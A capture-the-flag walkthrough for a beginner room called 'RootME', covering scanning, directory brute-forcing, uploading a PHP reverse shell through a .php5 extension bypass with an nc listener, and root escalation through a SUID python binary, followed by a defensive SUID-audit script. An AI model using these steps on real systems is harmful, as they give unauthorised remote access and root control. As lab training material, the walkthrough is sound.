🟒RootME

A ctf for beginners, can you root me?

Questions

  • Scan the machine, how many ports are open?

  • What version of Apache are running?

  • What is the hidden directory?

  • user.txt?

  • Search for files with SUID permission, which file is weird?

  • root.txt?

Enumeration

Nmap

nmap -sSVC -A -O -vv <TARGET_IP>

Q: Scan the machine, how many ports are open?

A: 2

Q: What version of Apache are running?

A: 2.4.29

Q: What service is running on port 22?

A: ssh

Finding directories/files

gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the IP is different because I continued this writeup the other day)

Q: What is the hidden directory?

A: /panel/

checking the directory /panel/, we have

let's try to upload a shell

shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o revs.php

remember to start a listener on a port

nc -lvp PORT

"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

mv revs.php revs.php5

it worked

to run it, click on "veja" ("see")

it worked, we have a shell

to get a tty

python -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg

export TERM=xterm

user.txt

finding

find / -type f -name user.txt 2>/dev/null

getting

cat /var/www/user.txt

root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

find / -type f -user root -perm -4000 2>/dev/null

Using python's SUID bit to run a shell as root:

python -c "import os;os.setuid(0);os.system('/bin/bash')"

getting
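
From the defender's side, the SUID search used above can be turned into a recurring audit that flags interpreters and shells, which should not normally carry the bit. This is an added example, not part of the original writeup; the function names and the interpreter name list are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: SUID audit that flags interpreters and shells.
# Function names and the interpreter list are assumptions for illustration;
# the list is not exhaustive.

# is_interpreter NAME: succeeds if the basename is a known interpreter or shell.
is_interpreter() {
    case "$1" in
        python|python[0-9]*|perl|perl[0-9]*|ruby|ruby[0-9]*|php|php[0-9]*) return 0 ;;
        node|lua|lua[0-9]*|sh|bash|dash|zsh|ksh) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_suid ROOT [OWNER]: same search as the find command above, one line per
# hit: "REVIEW<TAB>path" for interpreters, "ok<TAB>path" for everything else.
# Paths containing newlines are not handled.
audit_suid() {
    root=${1:-/}
    owner=${2:-root}
    find "$root" -type f -user "$owner" -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        if is_interpreter "${path##*/}"; then
            printf 'REVIEW\t%s\n' "$path"
        else
            printf 'ok\t%s\n' "$path"
        fi
    done
}

# count_flagged ROOT [OWNER]: number of SUID interpreters found.
count_flagged() {
    audit_suid "$@" | awk -F '\t' '$1 == "REVIEW" { n++ } END { print n + 0 }'
}

# Run the audit only when a directory is given, e.g.: sh suid_audit.sh /
if [ "$#" -gt 0 ]; then
    audit_suid "$@"
fi
```

A REVIEW hit is remediated by clearing the bit on that binary with chmod u-s.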
